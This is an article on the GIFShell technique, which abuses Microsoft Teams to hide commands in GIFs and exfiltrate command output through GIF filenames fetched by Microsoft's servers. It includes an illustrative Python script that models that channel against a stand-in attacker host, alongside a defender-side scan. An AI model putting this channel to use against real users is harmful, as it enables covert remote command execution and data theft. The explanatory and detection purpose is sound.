Researchers have identified a new attack technique, dubbed GIFShell, that abuses Microsoft Teams. According to reports, an operator could use it to deliver phishing lures and execute commands on a victim's machine through GIFs.
The core of the attack is the GIFShell tool, which lets an actor establish a reverse shell. Malicious commands are delivered through Base64-encoded GIFs in Microsoft Teams, and the command output is exfiltrated through GIFs that Microsoft's own servers fetch on the attacker's behalf.
The GIFShell attack tool establishes the reverse shell through a Teams webhook.
According to the researchers, the attacker first has to convince a user to install a stager. The stager executes the received commands and uploads their output, embedded in a GIF URL, to a Microsoft Teams webhook; that round trip is what forms the reverse shell.
To start the attack, the adversary tricks the targeted user into running a malicious executable stager on their system. The stager continuously scans the Microsoft Teams log files at a fixed location on disk. Messages received in Teams are stored in these logs, and the logs are readable by all Windows user groups, so any malware running on the system can read them as well.
Once the stager is in place, the attacker creates their own Teams tenant and contacts Teams users outside that organisation. The threat actors then use the GIFShell Python script to send a message containing a specially crafted GIF to a targeted Teams user.
The crafted GIF is a legitimate image file that additionally carries the commands to be executed on the targeted system.
Because the message is saved in the Teams log files, the stager that monitors them picks it up, extracts the commands from the GIF and executes them on the device. The GIFShell proof of concept then takes the output of the executed commands and converts it to Base64 text.
The stager uses that text as the filename of a GIF, embeds the GIF in a Microsoft Teams Survey Card, and submits the card to the attacker's webhook. Microsoft's servers then try to retrieve a GIF with exactly that name from the attacker's server.
The stolen output therefore travels in the filename of the GIF request itself: the attacker's GIFShell server receives the request from Microsoft and decodes the Base64 filename to recover the command output.
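The following Python script is an added illustration of the covert channel described above; it is not the GIFShell code or any code from the original report. It models both ends of the exchange (the command hidden in an inbound GIF name, the stager's Base64 filename inside a webhook card, and the decoding of the GIF request on the attacker's server) and adds a defender-side scan that flags GIF links whose name decodes to readable text. The attacker host, the simplified card layout and the log fragments are all assumptions constructed for the example, and no command is actually executed: the output is simulated.

```python
import base64
import binascii
import re
from typing import Optional
from urllib.parse import urlparse

# Hypothetical attacker host for the example; not taken from the original report.
ATTACKER_HOST = "https://gifshell.example"

GIF_URL_RE = re.compile(r"https?://[^\s\"'<>]+\.gif", re.IGNORECASE)


def _b64(data: bytes) -> str:
    """URL-safe Base64 without padding, so the text is a valid filename."""
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def _unb64(text: str) -> bytes:
    """Inverse of _b64; raises binascii.Error on non-Base64 input."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def gif_name_from_url(url: str) -> str:
    """Return the last path component of a GIF URL (or bare path) without the .gif suffix."""
    name = urlparse(url).path.rsplit("/", 1)[-1]
    return name[:-4] if name.lower().endswith(".gif") else name


def encode_command(cmd: str) -> str:
    """Attacker -> victim: hide a command in the name of the GIF sent in a Teams message."""
    return f"{ATTACKER_HOST}/{_b64(cmd.encode())}.gif"


def decode_command(url: str) -> str:
    """Stager: recover the command from a GIF URL found in the local Teams log."""
    return _unb64(gif_name_from_url(url)).decode()


def build_exfil_card(output: str) -> dict:
    """Stager -> webhook: carry the command output in a GIF filename inside a card.
    The card layout is a simplified stand-in (assumed), not the exact Survey Card schema."""
    return {
        "type": "message",
        "attachments": [{
            "contentType": "application/vnd.microsoft.card.adaptive",
            "content": {
                "type": "AdaptiveCard",
                "version": "1.4",
                "body": [{"type": "Image",
                          "url": f"{ATTACKER_HOST}/{_b64(output.encode())}.gif"}],
            },
        }],
    }


def decode_exfil_request(path_or_url: str) -> str:
    """Attacker's web server: Microsoft fetches the card's GIF, and the request path is the loot."""
    return _unb64(gif_name_from_url(path_or_url)).decode()


def simulate_round_trip(cmd: str, simulated_output: str):
    """Both sides of the channel in order: message -> stager -> webhook card -> GIF fetch.
    Returns (command as seen by the stager, output as recovered by the attacker)."""
    inbound_url = encode_command(cmd)            # attacker sends a Teams message with this GIF
    recovered_cmd = decode_command(inbound_url)  # stager reads it from the local Teams log
    card = build_exfil_card(simulated_output)    # stager posts the card to the attacker's webhook
    fetched = card["attachments"][0]["content"]["body"][0]["url"]  # Microsoft requests this GIF
    return recovered_cmd, decode_exfil_request(fetched)


def decoded_text_if_base64_name(url: str) -> Optional[str]:
    """Defender heuristic: the decoded text if the GIF name is Base64 that yields printable text.
    The 8-character floor is a tuning choice; short real names rarely decode to clean text anyway."""
    name = gif_name_from_url(url)
    if len(name) < 8 or not re.fullmatch(r"[A-Za-z0-9_-]+", name):
        return None
    try:
        text = _unb64(name).decode()
    except (binascii.Error, UnicodeDecodeError):
        return None
    if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def scan_log_for_encoded_gifs(lines):
    """Defender view: (url, decoded_text) for every GIF link whose name decodes to text."""
    hits = []
    for line in lines:
        for url in GIF_URL_RE.findall(line):
            text = decoded_text_if_base64_name(url)
            if text is not None:
                hits.append((url, text))
    return hits


# Constructed log fragments standing in for text extracted from the Teams log files;
# real entries are binary LevelDB records, this is only the message body a scanner would pull out.
SAMPLE_LOG = [
    'external chat: <img src="https://media.example/cats/dancing-cat.gif">',
    f'external chat: <img src="{encode_command("whoami /all")}">',
]

if __name__ == "__main__":
    print(simulate_round_trip("whoami /all", "corp\\alice"))
    print(scan_log_for_encoded_gifs(SAMPLE_LOG))
```

The same filename heuristic can be pointed at outbound webhook traffic: a card whose image URL has a Base64-looking name that decodes to text is the exfiltration half of the channel, and a GIF message from an external tenant whose name decodes to a command is the inbound half.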
The researchers demonstrated the GIFShell attack end to end after working through the possible exploitation scenarios. Microsoft has said it would consider addressing the underlying issues in a future product update.